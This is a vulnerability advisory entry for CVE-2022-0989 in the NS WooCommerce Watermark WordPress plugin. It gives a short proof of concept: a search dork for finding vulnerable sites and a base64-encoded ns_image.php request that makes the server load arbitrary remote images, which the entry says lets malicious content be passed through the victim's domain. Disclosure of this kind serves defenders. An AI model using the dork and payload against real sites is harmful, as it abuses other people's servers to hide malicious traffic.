Lucene search
Felipe Restrepo RodríguezWPEX-ID:A6BFC150-8E3F-4B2D-A6E1-09406AF41DD4HistoryMar 15, 2022 - 12:00 a.m.
NS WooCommerce Watermark <= 2.11.3 - Abuse of Functionality
2022-03-1500:00:00
Felipe Restrepo Rodríguez
69
vulnerable plugin
image watermark
base64 decode
EPSS
0.001
Percentile
33.9%
An unprivileged user could use the functionality of the plugin to load images that hide malware for example from passing malicious domains to hide their trace, by making them pass through the vulnerable domain.
Search for a vulnerable domain with the dork: "/wp-content/plugins/ns-woocommerce-watermark"
Then go to the path and add: //ns_image.php?param=aW1hZ2VfcGF0aD1odHRwczovL2MudGVub3IuY29tL0VtaVhDd0RKT3JJQUFBQWQvbG9sLXRyb2xvbG8uZ2lmJnd0X3BhdGg9aHR0cHM6Ly9jLnRlbm9yLmNvbS9FbWlYQ3dESk9ySUFBQUFkL2xvbC10cm9sb2xvLmdpZiZvdGhlcj0=
The param value can be modified by decoding it in base64: image_path=https://c.tenor.com/EmiXCwDJOrIAAAAd/lol-trololo.gif&wt_path=https://c.tenor.com/EmiXCwDJOrIAAAAd/lol-trololo.gif&other=
https://example.com/wp-content/plugins/ns-woocommerce-watermark/ns_image.php?param=aW1hZ2VfcGF0aD1odHRwczovL2MudGVub3IuY29tL0VtaVhDd0RKT3JJQUFBQWQvbG9sLXRyb2xvbG8uZ2lmJnd0X3BhdGg9aHR0cHM6Ly9jLnRlbm9yLmNvbS9FbWlYQ3dESk9ySUFBQUFkL2xvbC10cm9sb2xvLmdpZiZvdGhlcj0=Related
cve
cve
CVE-2022-0989
2022-04-11 15:15:08
nvd
nvd
CVE-2022-0989
2022-04-11 15:15:08
prion
prion
Hardcoded credentials
2022-04-11 15:15:00
cvelist
cvelist
CVE-2022-0989 NS WooCommerce Watermark <= 2.11.3 - Abuse of Functionality
2022-04-11 14:41:03
patchstack
patchstack
wpvulndb
wpvulndb
NS WooCommerce Watermark <= 2.11.3 - Abuse of Functionality
2022-03-15 00:00:00